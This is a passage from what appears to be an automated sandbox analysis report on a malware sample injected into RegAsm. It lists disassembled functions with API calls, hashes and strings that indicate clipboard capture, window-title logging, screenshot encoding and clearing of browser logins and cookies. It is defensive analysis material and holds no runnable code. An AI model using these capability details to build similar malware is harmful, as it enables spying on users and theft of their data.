Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044A08F
__alldvrm.LIBCMT ref: 0044A290
__alldvrm.LIBCMT ref: 0044A2B2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
__freea.LIBCMT ref: 100087D5

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0

Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C021
Sleep.KERNEL32(00001388), ref: 0040C0A9

Strings

[Cleared browsers logins and cookies.], xrefs: 0040C0E4
Cleared browsers logins and cookies., xrefs: 0040C0F5

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: a2f891f9d224728c04bbb1debadef956fab89d0381d541b8d2862f798e9015da
Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
Opcode Fuzzy Hash: a2f891f9d224728c04bbb1debadef956fab89d0381d541b8d2862f798e9015da
Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF

Function 004194C4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
EnumDisplayDevicesW.USER32(?), ref: 00419525
EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DisplayEnum$Devices$Monitors
String ID:
API String ID: 1432082543-0
Opcode ID: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
Opcode Fuzzy Hash: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A

Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
CloseHandle.KERNEL32(00000000), ref: 10001D7D

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: File$CloseHandleReadSize
String ID:
API String ID: 3642004256-0
Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594

Sleep.KERNEL32(000001F4), ref: 0040A573
Sleep.KERNEL32(00000064), ref: 0040A5FD

Strings

], xrefs: 0040A57B
[ , xrefs: 0040A58F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB

Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 0041B815
Sleep.KERNEL32(000003E8), ref: 0041B820
GetSystemTimes.KERNEL32(?,?,?), ref: 0041B835
__aulldiv.LIBCMT ref: 0041B89C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5

Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568

Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169

Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043987A

Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC

_UnwindNestedFrames.LIBCMT ref: 00439891
___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
CallCatchBlock.LIBVCRUNTIME ref: 004398C7

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5

Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004193F0
GetSystemMetrics.USER32 ref: 004193F6
GetSystemMetrics.USER32 ref: 004193FC
GetSystemMetrics.USER32 ref: 00419402

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785

Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B

Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F

Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442CED

Strings

pow, xrefs: 00442CC5, 00442CE2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F

Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1000655C

Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7

Strings

*?, xrefs: 10006433
., xrefs: 10006713

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50

Function 0044561B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00445703
__freea.LIBCMT ref: 00445789

Strings

8.v, xrefs: 0044562C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: 8.v
API String ID: 1635606685-1733865503
Opcode ID: b5bfd120457fd6491ffe418217d2ef53c53ab42291728ef1e813032315d7eb6d
Instruction ID: 8ea394e19242d531593115f3ad9b67f2d9726ff50e2d779c509e1c2fd2e4051b
Opcode Fuzzy Hash: b5bfd120457fd6491ffe418217d2ef53c53ab42291728ef1e813032315d7eb6d
Instruction Fuzzy Hash: F141D431A00511EBFF219B65CC42A5F77A4EF55720F65452BF808DB252EB3CD841C66D

Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418ABE

Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A

SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B

Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD

Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682

Strings

image/jpeg, xrefs: 00418AD5

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Stream$GdipImage$Create$DisposeFromLoadSave
String ID: image/jpeg
API String ID: 1291196975-3785015651
Opcode ID: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
Opcode Fuzzy Hash: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6

Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 0040B797

Strings

[End of clipboard], xrefs: 0040B7D9
[Text copied to clipboard], xrefs: 0040B7E6

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
Opcode Fuzzy Hash: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C

Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12

Strings

OCP, xrefs: 00451B8B
ACP, xrefs: 00451B55

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C

Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BAA

Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BCF

Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD

Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682

Strings

image/png, xrefs: 00418BC1

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Stream$GdipImage$Create$DisposeFromLoadSave
String ID: image/png
API String ID: 1291196975-2966254431
Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6

Function 00449BF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
GetFileType.KERNEL32 ref: 00449C4E

Strings

u, xrefs: 00449C85

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID: u
API String ID: 3000768030-1515575680
Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49

Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040501F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
Opcode Fuzzy Hash: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF

Function 0043C0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043C11E
_free.LIBCMT ref: 0043C144

Strings

